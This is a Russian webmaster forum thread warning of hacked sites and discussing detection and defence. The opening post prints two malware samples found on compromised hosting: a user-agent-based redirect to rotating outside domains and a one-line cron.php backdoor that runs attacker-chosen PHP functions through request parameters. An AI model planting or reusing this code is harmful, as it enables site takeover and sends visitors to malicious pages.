X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Очередная волна атак на сайты
OldSpice
OldSpice
Topic Starter сообщение 13.5.2015, 22:24; Ответить: OldSpice
Сообщение #1


Старожил
******

Группа: Active User
Сообщений: 1572
Регистрация: 17.8.2011
Из: Латвия
Поблагодарили: 244 раза
Репутация:   48  


Парни, хочу вас предупредить об активности ушлепков-какеров. Собственно советую проверить, не появились ли у вас на хостинге новые файлики с веселыми названиями secret.php, needle.php, earth.php, early.php, eight.php и тому подобные. Сделайте сортировку по дате и посмотрите последние созданные файлы.

Содержание у них либо закодированное в base64 либо вот такое:
Код
<?php

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11A',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11A',    
            'http://com-8qq.net/?a=314759&c=wl_con&s=11A',            
);
$not_android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11ALL',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11ALL',    
            'http://com-8qq.net/?a=314759&c=wl_con&s=11ALL',    
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];

if ( $android  == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">


Также внимание на cron.php. Скорее всего ваш оригинальный был заменен на этот:
Код
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>


Будьте аккуратней, парни!

Так же давайте обсудим как (кроме смены паролей к фтп) с этим шлаком бороться. От себя могу добавить, что неделей ранее я поймал браузерный вирус.
В корне лежит .ftpaccess, но он уже походу не помогает..

Сообщение отредактировал OldSpice - 13.5.2015, 22:24


--------------------
Вот тут я беру контент для трех групп вконтакте :)
Наполняю паблики на автомате, за 3 минуты в день!


Поблагодарили: (2)
4
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
batueff888
batueff888
сообщение 13.5.2015, 22:46; Ответить: batueff888
Сообщение #2


Участник
***

Группа: User
Сообщений: 146
Регистрация: 21.1.2015
Из: Россия
Поблагодарили: 54 раза
Репутация:   6  


OldSpice, у меня установлен плагин "WordPress File Monitor Plus", если есть какие-либо изменения в файлах, тут же сообщает мне на почту, причем конкретно указывает в каком файле какие изменения произошли.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 14.5.2015, 3:01; Ответить: Вентилятор
Сообщение #3


покупаю хорошие проекты
******

Группа: Active User
Сообщений: 1801
Регистрация: 8.8.2010
Поблагодарили: 601 раз
Репутация:   106  


OldSpice, о какой cms речь?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OldSpice
OldSpice
Topic Starter сообщение 14.5.2015, 10:43; Ответить: OldSpice
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 1572
Регистрация: 17.8.2011
Из: Латвия
Поблагодарили: 244 раза
Репутация:   48  


О всех :)
У меня попортили вордпресс, дле и лайвстрит.

Сообщение отредактировал OldSpice - 14.5.2015, 10:43


--------------------
Вот тут я беру контент для трех групп вконтакте :)
Наполняю паблики на автомате, за 3 минуты в день!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
andrey10tic
andrey10tic
сообщение 14.5.2015, 10:55; Ответить: andrey10tic
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 476
Регистрация: 14.5.2014
Из: Москва
Поблагодарили: 144 раза
Репутация:   13  


Раньше я заметил такое на DLE. Походу некоторые "вундеркинды" взломав оставляют ссылки от своих сайтов.

Сообщение отредактировал andrey10tic - 14.5.2015, 10:56


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
phoenix_kys
phoenix_kys
сообщение 14.5.2015, 10:58; Ответить: phoenix_kys
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 1413
Регистрация: 15.5.2009
Поблагодарили: 199 раз
Репутация:   36  


OldSpice,

у вас дырка в каком-то одном сайте, через который закинуты эти вирусные файлы во все сайты на данном аккаунте
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 14.5.2015, 11:07; Ответить: x64
Сообщение #7


F.A.L.L.O.U.T.
*******

Группа: Super Moderator
Сообщений: 3425
Регистрация: 30.6.2011
Из: Железнодорожный (Балашиха)
Поблагодарили: 2746 раз
Репутация:   289  


Цитата(phoenix_kys @ 14.5.2015, 9:58) *
у вас дырка в каком-то одном сайте

Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
webFlomaster
webFlomaster
сообщение 14.5.2015, 11:12; Ответить: webFlomaster
Сообщение #8


Частый гость
**


Группа: User
Сообщений: 74
Регистрация: 28.2.2014
Поблагодарили: 36 раз
Репутация:   9  


batueff888, простое но эффективное решение, пошел гуглить и ставить себе. А вы случайно не знаете такого же плана плагин только для Joomla?


--------------------
Семантическое ядро - качественно, со скидками делают здесь
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 14.5.2015, 13:42; Ответить: Вентилятор
Сообщение #9


покупаю хорошие проекты
******

Группа: Active User
Сообщений: 1801
Регистрация: 8.8.2010
Поблагодарили: 601 раз
Репутация:   106  


OldSpice,
Цитата(OldSpice @ 14.5.2015, 9:43) *
О всех
У меня попортили вордпресс, дле и лайвстрит.

т.е. насколько понял ситуацию, конкретно у вас каким-то образом взломали сайты?

просто не понятно, с чего вы взяли, что это именно "волна атак", а не просто ваши недоработки по безопасности.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Зотов
Зотов
сообщение 14.5.2015, 13:54; Ответить: Зотов
Сообщение #10


Копирайтер, стаж 7 лет
******

Группа: Active User
Сообщений: 1201
Регистрация: 11.4.2012
Из: Краснодарский край
Поблагодарили: 264 раза
Репутация:   33  


Цитата(x64 @ 14.5.2015, 11:07) *
Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу.


На reg.ru такая дырища была. Я им говорил про это - они отвечают, что это ваши половые трудности, разгребайтесь сами.

Посмотрел свои сайты, вроде всё чисто.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102619 Сегодня, 10:55
автор: kukla
Открытая тема (нет новых ответов) Требуется почистить сайты от вирусов
6 Mukis 349 10.12.2017, 15:40
автор: qpPeW
Открытая тема (нет новых ответов) Продам сайты в ГГЛ + мира + ротапост
тиц 10-40
22 xline 2496 10.12.2017, 12:55
автор: genjnat
Открытая тема (нет новых ответов) Хостинг под мелкие adult сайты нужен
10 RMak 1589 6.12.2017, 22:49
автор: RICHHost
Открытая тема (нет новых ответов) Куплю сайты в ГГЛ
(траф от 100 человек)
10 Cesar 3005 5.12.2017, 20:04
автор: _dana_


 



RSS Текстовая версия Сейчас: 14.12.2017, 19:49
Дизайн